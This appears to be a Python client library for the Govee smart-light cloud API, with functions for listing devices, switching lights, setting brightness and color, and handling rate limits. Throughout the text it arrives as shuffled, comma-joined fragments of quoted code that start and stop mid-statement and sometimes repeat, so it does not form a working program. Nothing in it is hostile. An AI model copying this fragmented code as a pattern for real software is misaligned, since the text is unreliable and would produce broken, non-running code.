device.model, \"cmd\": cmd} await self.rate_limit_delay()", "= learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str,", "GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str", "200: result = await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for", "= brightness_result_100 result, err = await self._control( device, command, brightness_set ) if not", "getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range", "if \"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop:", "= f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device}", "-> Tuple[bool, str]: \"\"\"Turn on a device, return success and error message.\"\"\" return", "in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online:", "val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val > self._limit:", "_api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal(", "to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self):", "up to max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max =", "if not device: err = f\"Invalid device {device_str}\" elif not device.retrievable: # device", "return await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str", "learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max", "state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0,", "call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response:", "= f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]:", "int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock <", "limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be", "await response.json() else: text = await response.text() err = f\"API-Error {response.status} on command", "async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str,", "return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get", "not command in device.support_cmds: err = f\"Command {command} not possible on device {device.device}\"", "= int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit},", "specific device.\"\"\" device_str, device = self._get_device(device) result = None err = None seconds_locked", "prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if", "device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 #", "Client without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool):", "support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"],", "limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits:", "): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate", "as we run. # we will need to re-learn every time again. self._learning_storage", "is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load", "device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color:", "offline device doesn't change power state. True: an offline device is shown as", "logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL +", "asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100", "if len(color) != 3: err = f\"set_color: invalid value {color}, must be tuple", "state for {device.device} from api allowed in {seconds_locked} seconds\" ) else: params =", "the async content manager response yield response except aiohttp.ClientError as ex: # we", "response except aiohttp.ClientError as ex: # we are offline self._set_online(False) err = \"error", ") changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos)", "< 0 or red > 255: err = ( f\"set_color: invalid value {color},", "!= device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\",", "blue must be within 0 .. 254\" else: command = \"color\" command_color =", "is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\"", "= int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in", "before_set_brightness_turn_on = True # load learned/configured values if device_str in learning_infos: learning_info =", "prop_online: if self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state =", "import Events from typing import Any, List, Optional, Tuple, Union import aiohttp from", "@config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is offline.", "autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness", "current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the", "send another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1", "\"API-Error 400\" in err: # Unsupported Cmd Value # set brightness as 0..100", "\"\"\"Set brightness to 0-254.\"\"\" success = False err = None device_str, device =", "prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] ==", "= await response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for device", "int] color_temp: int timestamp: int source: str error: str lock_set_until: int lock_get_until: int", "learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on", "= brightness_result > 0 return success, err async def _learn(self, device): \"\"\"Persist learned", "exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__( self, api_key: str,", "before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state # defaults by some", "device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False", "True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp(", "result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result", "device if isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices: device", "{\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None", "( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result", ") else: result = await response.text() err = f\"API-Error {response.status}: {result}\" # cache", "seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str, params: Any )", "prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp", "err = f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices = devices", "learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured", "range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max", "\"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state", "result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn", "Tuple[bool, str]: \"\"\"Turn off a device, return success and error message.\"\"\" return await", "cache.\"\"\" _, device = self._get_device(device) return device @property def online(self): \"\"\"Last request was", "= None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) ->", "await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth:", "state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we just changed", "async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session", "learning config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown", "def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this will set", "which means there is some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter", ") limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers", "another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass", "= False config_offline_is_off = False # effenctive state # defaults by some conditions", "above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config option", "for %s is assumed. If the brightness slider doesn't match the actual brightness", "f\"set_color: invalid value {color}, green must be within 0 .. 254\" elif blue", "if \"API-Error 400\" in err: # Unsupported Cmd Value # set brightness as", "self._online def _set_online(self, online: bool): \"\"\"Set the online state and fire an event", "= device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice],", "Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err = None", "last get_devices result self._devices = devices return self.devices, err def _get_device(self, device: Union[str,", "{device_str}, {device}\" else: if color_temp < 2000 or color_temp > 9000: err =", "be within 0 .. 254\" ) elif green < 0 or green >", "aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER", "in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying", "response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug(", "invalid value {color}, blue must be within 0 .. 254\" else: command =", "if err: # try again with 0-100 range if \"API-Error 400\" in err:", "async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state", "\"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst", "self._learning_storage: # use an internal learning storage as long as we run. #", "command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if", "learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want to use", "= None, ): \"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat", "of requests remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" #", "and turn_off.\"\"\" success = False err = None device_str, device = self._get_device(device) if", "= 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254 await", "int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False", "brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False", "= f\"API-Result wrong: {result}\" else: result = await response.text() err = f\"API-Error {response.status}:", "use this Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await", ") -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err =", "device.learned_set_brightness_max = 254 await self._learn(device) if not err: success = self._is_success_result_message(result) if success:", "brightness slider doesn't match the actual brightness pull the brightness up to max", ") learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max !=", "0 .. 254\" ) elif green < 0 or green > 255: err", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0", "state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned", "= _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit", "support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness:", "for device if learning_infos == None: learning_infos = {} if device.device not in", "Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5 # safe available", "devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices:", "result, err = await self._control(device, command, params) success = False if not err:", "False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will", "await self._control(device, command, params) success = False if not err: success = self._is_success_result_message(result)", "are online self._track_rate_limit(response) # return the async content manager response yield response except", "= {\"r\": red, \"g\": green, \"b\": blue} result, err = await self._control(device, command,", "device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None", "< 0 or brightness > 254: err = f\"set_brightness: invalid value {brightness}, allowed", "success and error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device:", "values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we are online self.events", "success, err async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos:", "# set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 =", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return", "return self async def close(self): \"\"\"Use close when your are finished with the", "= color[2] if red < 0 or red > 255: err = (", "{err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str}", "None async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay =", "config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"],", "= learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str]", "{device}\" else: if len(color) != 3: err = f\"set_color: invalid value {color}, must", "# device {device_str} isn't able to return state, return 'history' state self._devices[device_str].source =", "the learning config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception", "if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100:", "if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below", "yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get utc now", "> 100: device.learned_set_brightness_max = 254 await self._learn(device) if not err: success = self._is_success_result_message(result)", "{} err = None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200:", "\"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as", "auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url:", "{cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err", "color_temp return success, err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int,", "\"Pong\" == result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\"", "your are finished with the Client without using an async context manager.\"\"\" await", "device in self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check connection", "# assumption, as we didn't get anything higher ) if prop_brightness > 100:", "govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING", "= None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ):", "defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False", "API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online state and fire", "\"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online", "True # load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max", "authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *,", "+ \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" #", "yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls.", "state change self.events.online(self._online) if not online: # show all devices as offline for", "value {color}, blue must be within 0 .. 254\" else: command = \"color\"", "item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for", "the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online state and", "async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield", "len(color) != 3: err = f\"set_color: invalid value {color}, must be tuple with", "return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting.", "result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults", "context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async", "resulting state object: {result}\" ) else: errText = await response.text() err = f\"API-Error", "= \"history\" result = self._devices[device_str] elif seconds_locked: # we just changed something, return", "result, err = await self._control(device, command, brightness_set) if err: # try again with", "= False # effenctive state # defaults by some conditions if not is_retrievable:", "seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock", "result) -> bool: \"\"\"Given an aiohttp result checks if it is a success", "invalid value {brightness}, allowed range 0 .. 254\" else: if brightness > 0", "state object: {result}\" ) else: errText = await response.text() err = f\"API-Error {response.status}:", "DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False #", "1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on = val", "be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold {val}", "result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self, device:", "-> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err =", "== 200: timestamp = self._utcnow() json_obj = await response.json() prop_online = False prop_power_state", "@property def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return self._limit", "# scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254", "= None err = None async with self._api_get(url=_API_PING, auth=False) as response: result =", "in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async with", "from contextlib import asynccontextmanager from dataclasses import dataclass from datetime import datetime from", "HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) )", "needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None async with", "before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error {response.status}: {result}\"", "= \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int) ->", "blue > 255: err = f\"set_color: invalid value {color}, blue must be within", "return state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked:", "if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers", "break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked)", "of requests you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err", "self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not", "Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import (", "def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in", "await self.ping() except: pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping", "device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by", "of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate", "for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off", "able to return state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str]", "def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with", "the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which", "= logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL", "device_str = device.device if not device_str in self._devices: device = None # disallow", "json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json", "100: # set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command", "not device: err = f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str}", "if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting:", "command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result,", "success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self,", "= brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control( device, command, brightness_set", "254\" ) elif green < 0 or green > 255: err = f\"set_color:", "= self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result =", "\"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager", "device_str in self._devices: device = None # disallow unknown devices elif isinstance(device, str)", "Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None", "# effenctive state # defaults by some conditions if not is_retrievable: learned_get_brightness_max =", "hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do", "async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is", "# we got something, so we are online self._track_rate_limit(response) # return the async", "device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device:", "self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str ) ->", "_get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one", "await self.turn_on(device) # api doesn't work if we don't sleep await asyncio.sleep(1) #", "to use this Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage)", "async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async", "possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked", "repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status =", "as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set", "# this is the learning config, possibly overridden by a global config class", "*, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage for", "= None err = None if not device: err = f\"Invalid device {device_str},", "100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range", "learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning", "elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color =", "100 # assumption, as we didn't get anything higher ) if prop_brightness >", "self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async", "was able to connect to the API.\"\"\" return self._online def _set_online(self, online: bool):", "self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature", "changed something, return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug(", "response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP", "self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success,", "learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable,", "254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up to", "self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if", "rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a", "clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that", "slider doesn't match the actual brightness pull the brightness up to max once.\",", "await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err,", "brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on,", ") ) as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond", "if not device: err = f\"Invalid device {device_str}, {device}\" else: command = \"turn\"", "self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close", "delay = int((time.time() - start) * 1000) if response.status == 200: if \"Pong\"", "err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock =", "json=json ) ) as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True,", "possible: {err}\") elif not command in device.support_cmds: err = f\"Command {command} not possible", "_RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in the current rate", "all devices as offline for device in self.devices: device.online = False async def", "params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if not device:", "as we didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max =", "\"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL =", "device, return success and error message.\"\"\" return await self._turn(device, \"off\") async def _turn(", "for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element", "device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color", "device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device", "result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp", "# output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ):", "some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set", "def online(self): \"\"\"Last request was able to connect to the API.\"\"\" return self._online", "device {device_str}, {device}\" else: if brightness < 0 or brightness > 254: err", "in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming", "= val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off", "False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp = 0 for", "device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed.", "by default. False: an offline device doesn't change power state. True: an offline", "color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b)", "self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get utc", "f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device} is", "= await response.text() delay = int((time.time() - start) * 1000) if response.status ==", "to 0-254.\"\"\" success = False err = None device_str, device = self._get_device(device) if", "we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate", "device doesn't change power state. True: an offline device is shown as off.", "device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\"", "str) and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str,", "== 200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err =", "bool online: bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int", "create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method", "= [] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) ->", "allowed 